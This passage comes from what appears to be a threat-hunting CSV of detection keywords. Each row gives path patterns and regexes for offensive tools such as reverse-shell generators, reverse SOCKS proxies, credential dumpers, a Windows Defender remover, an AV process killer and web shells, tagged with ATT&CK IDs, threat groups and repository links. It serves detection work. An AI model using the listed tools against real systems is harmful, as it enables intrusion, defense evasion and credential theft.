Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","10400" "*/remoteshell.py*",".{0,1000}\/remoteshell\.py.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","10401" "*/remoteshell.py*",".{0,1000}\/remoteshell\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","10402" "*/Remove_defender_moduled*",".{0,1000}\/Remove_defender_moduled.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","10403" "*/request_shellcode.exe*",".{0,1000}\/request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10404" "*/resocks * --key *",".{0,1000}\/resocks\s.{0,1000}\s\-\-key\s.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10406" "*/resocks.git*",".{0,1000}\/resocks\.git.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10407" "*/resocks/releases/latest*",".{0,1000}\/resocks\/releases\/latest.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10408" "*/resocks_*_Linux_x86_64.tar.gz*",".{0,1000}\/resocks_.{0,1000}_Linux_x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10409" "*/resocks_*_macOS_arm64.tar.gz*",".{0,1000}\/resocks_.{0,1000}_macOS_arm64\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10410" "*/resocks_Darwin_x86_64.tar.gz*",".{0,1000}\/resocks_Darwin_x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10411" "*/resocks_Linux_*.tar.gz*",".{0,1000}\/resocks_Linux_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10412" "*/resolveall.nse*",".{0,1000}\/resolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10413" "*/resources/PROCEXP.sys*",".{0,1000}\/resources\/PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","10414" "*/Resources/Webcam.dll*",".{0,1000}\/Resources\/Webcam\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","10415" "*/Responder.git*",".{0,1000}\/Responder\.git.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","10416" "*/responder/Responder.conf *",".{0,1000}\/responder\/Responder\.conf\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","10417" "*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10418" "*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","10419" "*/Responder-master.zip*",".{0,1000}\/Responder\-master\.zip.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","10420" "*/Responder-Session.log*",".{0,1000}\/Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#linux","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","10421" "*/Responder-Windows.git*",".{0,1000}\/Responder\-Windows\.git.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","1","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","10422" "*/restoresig.py*",".{0,1000}\/restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","10429" "*/returnvar/wce/*",".{0,1000}\/returnvar\/wce\/.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","10430" "*/rev_shell.py*",".{0,1000}\/rev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","10431" "*/revbshell.git*",".{0,1000}\/revbshell\.git.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - 
Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","1","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","10432" "*/Reverse Shell Tab -->*",".{0,1000}\/Reverse\sShell\sTab\s\-\-\>.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10433" "*/reverse.exe*",".{0,1000}\/reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10434" "*/reverse-index.nse*",".{0,1000}\/reverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10435" "*/ReverseShell.ahk*",".{0,1000}\/ReverseShell\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","10436" "*/reverseShell-1.0.1-zip.zip*",".{0,1000}\/reverseShell\-1\.0\.1\-zip\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","10437" "*/reverse-shellcode.cpp*",".{0,1000}\/reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","10438" "*/reverse-shell-generator*",".{0,1000}\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1105 - 
T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","N/A","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10439" "*/reverse-shell-generator.git*",".{0,1000}\/reverse\-shell\-generator\.git.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10440" "*/ReverseSock5Proxy.git*",".{0,1000}\/ReverseSock5Proxy\.git.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","10441" "*/ReverseSock5Proxy/tarball/*",".{0,1000}\/ReverseSock5Proxy\/tarball\/.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","10442" "*/ReverseSock5Proxy/zipball/*",".{0,1000}\/ReverseSock5Proxy\/zipball\/.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","10443" "*/reverse-ssh.git*",".{0,1000}\/reverse\-ssh\.git.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10444" "*/reverse-ssh/*",".{0,1000}\/reverse\-ssh\/.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#linux","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10445" "*/reverse-ssh-armv7-x86*",".{0,1000}\/reverse\-ssh\-armv7\-x86.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10446" "*/reverse-ssh-armv8-x64*",".{0,1000}\/reverse\-ssh\-armv8\-x64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10447" "*/reverse-sshx64*",".{0,1000}\/reverse\-sshx64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10448" "*/reversetcp.py*",".{0,1000}\/reversetcp\.py.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed 
for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","10449" "*/ReverseTCPShell*",".{0,1000}\/ReverseTCPShell.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","10450" "*/reverst.git*",".{0,1000}\/reverst\.git.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","10454" "*/reverst.git*",".{0,1000}\/reverst\.git.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","10455" "*/RevlCmd.dll*",".{0,1000}\/RevlCmd\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","10456" "*/Rev-Shell.git*",".{0,1000}\/Rev\-Shell\.git.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell 
payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","10458" "*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","10459" "*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10460" "*/revshell.py*",".{0,1000}\/revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","10461" "*/revshell32.bin*",".{0,1000}\/revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","10462" "*/revshell64.bin*",".{0,1000}\/revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","10463" "*/revshells.com*",".{0,1000}\/revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10464" "*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","1","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","10465" "*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","10466" "*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform 
SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","1","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","10467" "*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","10468" "*/rexec-brute.nse*",".{0,1000}\/rexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10469" "*/rfc868-time.nse*",".{0,1000}\/rfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10470" "*/rfs_injection.exe*",".{0,1000}\/rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10471" "*/RGPerson.py*",".{0,1000}\/RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","10473" "*/riak-http-info.nse*",".{0,1000}\/riak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
